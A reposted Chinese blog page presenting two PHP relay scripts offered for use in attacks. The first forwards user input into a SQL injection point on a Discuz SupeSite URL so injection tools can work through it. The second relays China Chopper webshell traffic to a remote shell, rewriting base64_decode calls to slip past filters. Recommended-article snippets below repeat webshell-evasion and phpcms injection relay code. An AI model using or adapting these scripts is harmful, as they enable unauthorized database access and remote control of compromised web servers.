PHP中转访问脚本一枚

最新推荐文章于 2021-11-30 14:44:50 发布
最新推荐文章于 2021-11-30 14:44:50 发布
阅读量356 收藏 1
点赞数
文章标签: php python shell
原文链接:https://my.oschina.net/rookier/blog/395919
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

<?php
set_time_limit(0); 
$id=$_GET["id"]; 
$id=str_replace(" ","%20",$id); 
$id=str_replace("=","%3D",$id); 

$url = "http://blog.discuz.com/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=$id%23"; //supsite 注入页面

echo $url;

$ch = curl_init(); 
curl_setopt($ch, CURLOPT_URL, "$url"); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_HEADER, 0);

$output = curl_exec($ch); 
curl_close($ch); 
print_r($output);
?>

将这个文件保存成inj.php即可,这个文件url如下:

    http://localhost/inj/inj.php

    把需要访问的$id根据目标页的伪静态规则放到指定的位置就可以了。如上。

    原理就是通过curl来取得目标页的内容(与直接访问目标页效果一样),只需要修改$url的内容就可以适应各种伪静态规则了。

    脚本比较简陋,有需要的童鞋,可根据情况加入post方式,代理,referer等功能。

    我们现在访问 http://localhost/inj/inj.php?id=1,

    即相当于访问 http://localhost/inj/index.php/index/index/id/1.html ,

    呵呵,现在我们就可以通过访问 http://localhost/inj/inj.php?id=1 这个连接访问ado服务器的相关页面了。顺便淘到了一个POST的中转的

<?php 
$webshell="http://www.phpinfo.me/plus/helen.php";//把这里改成你的shell地址 
$webshell=$webshell."?&1141056911=base64_decode"; 

$da=$_POST; 
$data = $da; 
@$data=str_replace("base64_decode(",'$_GET[1141056911](',$data); //接收菜刀的post,并把base64_decode替换成$_GET[1141056911]( 

//print_r($data); 

$data = http_build_query($data);   
$opts = array (   
'http' => array (   
'method' => 'POST',   
'header'=> "Content-type: application/x-www-form-urlencoded\r\n" .   
"Content-Length: " . strlen($data) . "\r\n",   
'content' => $data) 
); 
   
$context = stream_context_create($opts);   
$html = @file_get_contents($webshell, false, $context); //发送post   
echo $html;   


?>


转载于:https://my.oschina.net/rookier/blog/395919

weixin_33725807
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP 数据的中转
05-25
NULL 博文链接:https://huanlong78.iteye.com/blog/466797
一个中转脚本
p656456564545的专栏
06-14 1067
$querystring="http://tjsic.tongji.edu.cn/WebServices/adminWS.asmx/checkAdmin"; $cookie_jar="pgv_pvi=4450805760; Hm_lvt_d5a76608e07e4903e91fe94d34b3cc0d=1434014983; AMAuthCookie=AQIC5wM2LY4SfcyPoh
PHP中转链接文件
hotlinhao的专栏
11-30 2025
场景: 有个链接,我不想让别人看到是其它网站上的内容,所有的访问都必须经过我的过滤。 办法: 从外面拿过来,放到我这里。不管谁要用都得从我这里拿;同时我就负起了监管责任。 readfile()函数 readfile() 函数输出一个文件。 该函数读入一个文件并写入到输出缓冲。 若成功,则返回从文件中读入的字节数。若失败,则返回 false。您可以通过 @readfile() 形式调用该函数,来隐藏错误信息。 提示和注释 提示:如果在 php.ini 文件中...
php中转注入,phpcms authkey注入中转脚本
weixin_28701593的博客
03-16 142
set_time_limit(0);$wang_url='http://www.0day5.com';$auth_key='xxxxxxxxxxxxxxxxxxxxxxxxxxxx';$str="uid=1".stripslashes($_GET['id']);$encode=sys_auth($str,'ENCODE',$auth_key);$content=file_g...
PHP】文件转移
ascu72892的博客
11-24 189
今天看到一段经典代码,感觉太厉害了 function recurse_copy( $src , $dst ){ $handle = opendir( $src ); @mkdir( $dst ); while( false !== ( $file = readdir( $handle ) ) ) { if( ( $...
c45-to-php:在PHP脚本中转换了C4.5树
04-30
PHP脚本中转换了C4.5树 如何使用 首先:创建您的file.data和您的file.names 第二 : include(__DIR__ . '/C45.class.php'); $c45 = new C45('file'); $c45->parse(); // See the script echo $c45->php; ...
基于PHP的爱特 php文件管理中转上传 v1.8.1.zip
07-24
【标签】"PHP"确认了这个软件是用PHP开发的,PHP是一种广泛使用的开源脚本语言,尤其适合于Web开发,能够快速构建动态、交互式的网站。它具有丰富的库支持,社区活跃,且兼容性好,适用于各种服务器平台。 【压缩...
基于PHP的爱特php文件管理中转上传v1.8.1源码.zip
最新发布
09-03
【标题】"基于PHP的爱特php文件管理中转上传v1.8.1源码.zip" 提供的是一款基于PHP编程语言的文件管理及上传系统。这个系统主要用于处理文件的上传、存储和管理,是Web应用开发中的一个重要组件。在PHP环境中,这样的...
第一机床厂物资配送中转站的建立与应用
06-29
第一机床厂物资配送中转站的建立与应用
php服务器中转文件,使用php在服务器之间传输文件
weixin_39600704的博客
03-13 323
标签:phpHelloI wrote a little code in php that enables me to download a file from onewebsite to my own!but there is a little problem here!I can only Download files from my website that are less than 4MB...
php+七牛文件中转
11-24
说明: 这是一个七牛+php编写的云文件存储的网站,用户可以借助七牛云存储以及新浪SAE平台搭建一个通过网址下载自己东西的地方。 使用: 进入qiniu文件夹,找到conf.php文件,按照提示配置相关信息。
php中转菜刀脚本过狗免杀
weixin_30558305的博客
06-16 327
<?php $target="url";//shell 地址 菜刀连这个脚本中转 $post=''; $i=0; foreach($_POST AS $K=>$V) { if(strstr($v,"base64_decode")) { $v=str_replace("base64_decode(","",$v); ...
POST+referer注入中转脚本
收集盒 Book box
04-07 1904
最近碰到一个站,只能POST数据,不能用GET,而且加了referer限制,所以一般的注入工个无法使用,当然cookie也不行。难道说要手工注入,那不累死才怪,突然想起php有curl可以POST数据,于是网上找来代码,修改一下,如下: set_time_limit(0); $id=$_GET["id"]; $id=str_replace(" ","%20",$id); $id
php中转,我需要PHP做个中转,post上传数据到网站,然后返回结果,PHP代码如下,哪块错了啊?...
weixin_42474537的博客
03-11 236
问题补充:header('Content-Type: text/html; charset=utf-8');// header('Content-Type: application/json; charset=utf-8');header('Access-Control-Allow-Origin: *');header("Access-Control-Allow-Credentials: true...
php脚本 端口映射,Linux端口映射转发的方法
weixin_32141253的博客
03-28 303
前言当我们在对接第三方的时候,免不了会遇到白名单限制问题,导致我们本地开发环境受限,不能调用接口。难以完成整个业务流程。分析如下场景:比如第三方有台机器 IP 为 1.1.1.1 端口8080正式环境为1.1.1.1:8080/pro/api测试环境为1.1.1.1:8080/test/api但是第三方的机器不允许任何IP都可以调用,他们只允许你方一台机器加入白名单比如你线上的一台机器IP是2....
php流量中转,PHP实现流量复制tcpcopy ( php + python)
weixin_27011811的博客
03-21 1765
看了tcpcopy的源码,phppython 都可以操作raw socket,因此,用phppython 实现了tcpcopy,代码比较简单tcpcopy关键点,理认上来说,只要得到tcp请求报文中数据部分,在ip层转发到测试服务器,即可实现流量复制。因此,只需要维护tcp会话即可维护一个假的tcp连接,骗过测试服务器即可。代码实现,主要以TCP状态机为基础,同时考虑抓包的无序问题,结...
php 做网站中转
lj102800的专栏
11-16 1502
遇到问题post,携带cookie,header问题 cookie时CURLOPT_COOKIEFILE携带不上cookie是cookie文件读取权限问题,换了个路径解决了 header时,$header = ['User-Agent: php test']报错,是php版本太低的问题 ini_set('user_agent','Mozilla/4.0 (compatible; MSI...
php中转,使用 PHP Curl 做数据中转
weixin_39958366的博客
03-11 334
使用 PHP Curl 做数据中转流程收集头部信息收集请求数据转换头部信息为 CURL 头部请求格式使用 Curl 进行转发收集 HTTP 头信息function getAllHeaders() {$headers = [];foreach ($_SERVER as $name => $value) {if (substr($name, 0, 5) == 'HTTP_') {$headers...
php做端口转发,利用PHP和linux shell在ubuntu服务器实现自动端口转发
weixin_42294495的博客
04-08 561
前言:在用动态ip分配协议的网络环境下远程控制自己的主机最烦的就是ip会经常改变,而安装teamviewer这些软件又没有用rdp那么快速,所以经常开机后第一件事就是把ip地址记下来,然后再从其他机器远程进来。因为手头掌控着一台有固定ip地址的服务器,我想能不能通过这台服务器自动记录自己机器每次获得在ip,然后可以很方便地进行远程控制,只要机器是开着的。以前是在机器上写脚本在开机的时候上传ip地址...
bat 脚本中转义字符
05-26
在 Windows 的批处理文件(.bat 文件)中,使用 ^ 符号来转义特殊字符,例如: - ^& 表示 & 字符 - ^| 表示 | 字符 - ^^ 表示 ^ 字符 - ^> 表示 > 字符 - ^表示 字符 例如,要在批处理文件中输出 "hello & world...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值